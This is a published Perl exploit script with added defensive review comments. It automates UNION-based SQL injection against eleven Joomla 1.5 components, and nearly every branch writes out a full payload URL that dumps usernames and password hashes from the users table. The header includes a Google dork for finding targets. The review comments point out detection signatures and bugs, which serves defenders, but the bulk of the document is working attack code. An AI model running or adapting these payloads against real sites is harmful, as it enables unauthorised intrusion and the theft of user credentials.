
Joomla 1.5.x Multi Component SQL Injector Exploit


#Exploit Title: Joomla 1.5.x Multi Component SQL Injector ()
#Exploit Author: D35m0nd142
#Date: 28/01/2013
#Google Dork: inurl:"com_..."
#!/usr/bin/perl
# Review notes (defensive reading of this published PoC; the code is left as-is):
#   - Flat script with no `use strict`/`use warnings`: every variable is a
#     package global and missing or non-numeric input is silently coerced.
#   - Picks one of eleven UNION-based SQL injection GET requests (or, for
#     option 12, all of them in sequence) against a Joomla 1.5 site and then
#     greps the response body for any 32-hex-digit token.
#   - Artefacts a defender can key on: the fixed, outdated User-Agent string
#     set below, query strings containing `union ... select ... from jos_users`,
#     and for option 12 a burst of requests to several different com_*
#     components from one client within a few seconds.
use IO::Socket::INET;   # imported but never referenced anywhere in this script
use LWP::UserAgent;     # HTTP::Request is used below without its own `use`; LWP::UserAgent loads it
system("clear");        # shells out with a fixed string (no user input involved)
print "---------------------------------------------\n";
print "  Joomla 1.5.x Multi Component SQL Injector  \n";
print "          Created by D35m0nd142              \n";
print "---------------------------------------------\n\n";
# Positional CLI arguments: base URL and a component number (1-12).
$target = $ARGV[0];
$component = $ARGV[1];
if($target eq '' || $component eq '')
{
print "Usage: ./exploit.pl <target> <component> \n";
print "-----------------------------------\n";
print " Available components :        \n";
print " 1- com_alfurqan15x            \n";
print " 2- com_jobprofile             \n";
print " 3- com_question               \n";
print " 4- com_joomloc                \n";
print " 5- com_joomlub               \n";
print " 6- com_manager                \n";
print " 7- com_iproperty              \n";
print " 8- com_jooproperty               \n";
print " 9- com_digifolio                 \n";
print " 10- com_rdautos                   \n";
print " 11- com_ownbiblio                \n";
print " 12- try to exploit all components \n";
print "-----------------------------------\n";
print " Example: ./exploit.pl http://www.site.com/spa/ 1 \n\n";
exit(1);
}

# Bareword handle, two-argument open, return value unchecked. Nothing is ever
# printed to FILE and it is never closed, so the only effect is that an empty
# contents11.txt is created/truncated in the current directory each run -- a
# host-side artefact of the tool having been executed.
open(FILE, "> contents11.txt");

# Only the literal "http://" prefix is recognised; the script never speaks TLS.
if($target !~ /http:\/\//)
{
$target = "http://$target";
}

sleep 1.5;   # sleep() truncates to whole seconds, so this is a 1-second pause
$agent = LWP::UserAgent->new();
# Static User-Agent for every request (Firefox 7.0.1 on Windows 7). A fixed,
# years-old UA string like this is a cheap signature for web-server log review.
$agent->agent('Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1');
# Component dispatch: numeric `==` means a non-numeric second argument compares
# as 0, matches nothing, and the script exits silently without any request.
if($component == 1)
{
# UNION SELECT injected via the `surano` parameter, reading the default
# jos_users table.
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
print " . . Exploiting com_alfurqan15x on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
# "Success" is any run of 32 hex digits anywhere in the response. This is the
# same check in every branch below; it also fires on unrelated MD5-length
# tokens in a page, so a "[+] Password found" line is not proof of compromise.
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password \n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 2)
{
# As published, `&amp;` (HTML-escaped ampersands) and the missing "/" before
# index.php are sent verbatim in this and several later URLs -- presumably
# artefacts of the page the script was copied from.
$host = $target . "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
print " . . Exploiting com_jobprofile on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 3)
{
# Quote-terminated injection in `catID`, with raw spaces and a "#" left
# unencoded in the query string.
$host = $target . "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
print " . . Exploiting com_question on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 4)
{
# Injection in the `id` parameter of the edit task; 56-column UNION.
$host = $target . "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
print " . . Exploiting com_joomloc on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 5)
{
print " . . Exploiting com_joomlub on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
# Five variants of the same `aid` injection, differing only in comment
# terminator, casing and concat()/concat_ws(); all five are always requested,
# so a single client hitting com_joomlub five times in ~10 s is characteristic.
$host = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host1 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host2 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host3 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host4= $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";

@hosts = ($host,$host1,$host2,$host3,$host4);
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
sleep 1;
}
}
}

if($component == 6)
{
# Injection in `Itemid` using /**/ as whitespace (a common filter-evasion
# form; a WAF rule that only keys on spaces around UNION/SELECT misses it).
$host = $target . "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_manager on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 7)
{
# Same /**/-spaced payload shape as com_manager, injected via `id`.
$host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_iproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 8)
{
# Note the hard-coded non-default table prefix `dy978_users`: this payload is
# tied to whichever single site it was originally written against.
$host = $target . "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
print " . . Exploiting com_jooproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 9)
{
$host = $target. "/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--";
print " . . Exploiting com_digifolio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 10)
{
$host = $target . "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
print " . . Exploiting com_rdautos on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

if($component == 11)
{
$host = $target. "/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
print " . . Exploiting com_ownbiblio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}

# Option 12: a copy-paste of branches 1-11 run back to back with 2-second gaps.
# The URLs and the 32-hex-digit check are identical to the per-component
# branches above; see the comments there.
if($component == 12)
{
print " . . Trying to exploit all available components . . \n\n";
sleep 2;
$host = $target . "/index.php?option=com_alfurqan15x&action=viewayat&surano=-999.9+UNION+ALL+SELECT+1,concat_ws(0x3a,username,0x3a,password)kaMtiEz,3,4,5+from+jos_users--";
print " . . Exploiting com_alfurqan15x on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password \n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "index.php?option=com_jobprofile&amp;Itemid=61&amp;task=profilesview&amp;id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--";
print " . . Exploiting com_jobprofile on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php/?option=com_question&amp;catID=21' and+1=0 union all select  # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20";
print " . . Exploiting com_question on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_joomloc&amp;controller=loc&amp;view=loc&amp;layout=loc&amp;task=edit&amp;cid[]=1&amp;id=1 and 1=2 union select 1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56+from+jos_users";
print " . . Exploiting com_joomloc on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

print " . . Exploiting com_joomlub on target $target . . \n\n";
sleep 1;
print " . . Trying different types of injection for this component . . wait please . . \n\n";
$host = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host1 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";
$host2 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20union%20all%20select%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host3 = $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=2'%20and+1=0%20union%20all%20select%20#%20|%201,2,3,concat_ws(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users--%20";
$host4= $target . "/index.php?option=com_joomlub&amp;controller=auction&amp;view=auction&amp;task=edit&amp;aid=-2%20UNION%20ALL%20SELECT%201,2,3,concat(0x3a,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+from+jos_users";

@hosts = ($host,$host1,$host2,$host3,$host4);
# NOTE: the `}` that closes this foreach is placed after the com_manager block
# below, so in option 12 the com_manager request is issued once per com_joomlub
# variant (five times in total), with a 2-second pause before each.
foreach $hos(@hosts)
{
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$hos));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "Password found --> $password :) . \n\n";
sleep 1;
}
else
{
print "Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_manager&view=flight&Itemid=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_manager on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}
}   # end of foreach over @hosts (encloses the com_manager request above)

sleep 2;

$host = $target . "/index.php?option=com_iproperty&view=agentproperties&id=-999999/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,group_concat(username,char(58),password)v3n0m/**/from/**/jos_users--";
print " . . Exploiting com_iproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+";
print " . . Exploiting com_jooproperty on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target. "/index.php?option=com_digifolio&view=project&id=10/**/and/**/1=2/**/union/**/select/**/1,2,group_concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/jos_users--";
print " . . Exploiting com_digifolio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target . "/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users--&Itemid=54";
print " . . Exploiting com_rdautos on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

$host = $target. "/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users--";
print " . . Exploiting com_ownbiblio on target $target . . \n\n";
sleep 1;
$req = $agent->request(HTTP::Request->new(GET=>$host));
$content = $req->content;
if($content =~ /([0-9a-fA-F]{32})/)
{
$password = $1;
print "[+] Password found --> $password :) .\n\n";
sleep 1;
}
else
{
print "[-] Password not found :( . \n\n";
}

sleep 2;

print "[+] Attack finished. \n\n";

}   # end of option 12; the script then falls off the end (FILE is never closed explicitly)




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information


